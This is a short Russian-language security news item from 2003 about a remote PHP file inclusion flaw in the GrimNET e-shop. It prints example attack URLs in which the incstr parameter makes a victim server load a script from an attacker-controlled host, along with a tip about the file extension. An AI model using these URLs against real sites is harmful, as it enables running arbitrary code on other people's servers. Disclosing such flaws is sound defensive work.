BugTraq.Ru
Русский BugTraq
http://www.bugtraq.ru/rsn/archive/2003/10/37.html

Выполнение произвольного PHP-кода в GrimNET e-shop
dl // 20.10.03 22:37
Не представляю, насколько актуальна эта самая корейская система электронных магазинов, но дырка любопытна и сама по себе.
[Не забывайте при копировании материала указывать полный адрес источника: http://www.bugtraq.ru/rsn/archive/2003/10/37.html]

Входящие в ее комплект файлы shop.html и notice.html позволяют подключить к себе (и в дальнейшем выполнить) любой файл, указанный в переменной incstr без какой бы то ни было проверки содержимого:
http://[victim]/shop.html?incstr=http://[hacker]/myfile.php
http://[victim]/notice.html?incstr=http://[hacker]/myfile.php
Если на атакующем хосте установлен php, то сценарию, естественно, нужно дать расширение, не приводящее к его исполнению - например myfile.inc.

Источник: NivaX, http://www.web-hack.ru      
теги: .net  |  предложить новость  |  обсудить  |  все отзывы (0) [3596]
назад «  » вперед

аналогичные материалы
Взлом 180 тысяч ASP.Net сайтов через sql-инъекции // 21.10.11 00:22
Плагин MS ставил под удар пользователей FireFox // 17.10.09 01:57
Октябрьские обновления от MS // 14.10.09 00:19
Августовские обновления от MS // 11.08.09 22:40
Microsoft представила новый язык программирования // 11.05.09 21:10
Обход защиты памяти в Vista // 12.08.08 02:11
Эти страшные NULL-pointerы // 05.05.08 22:24
 
последние новости
The Great Suspender предположительно превратился во вредоноса // 05.02.21 00:47
Десятилетняя уязвимость в sudo // 27.01.21 12:25
Блокировка Flash поломала китайскую железную дорогу // 24.01.21 22:17
Анализ SolarWinds-атаки от Microsoft // 21.01.21 20:50
С наступающим // 31.12.20 23:59
Apple, Google, Microsoft и Mozilla забанили казахстанский сертификат // 19.12.20 03:13
Cloudflare, Apple и Fastly предложили новый DNS-протокол // 09.12.20 05:10



  Copyright © 2001-2021 Dmitry Leonov Design: Vadim Derkach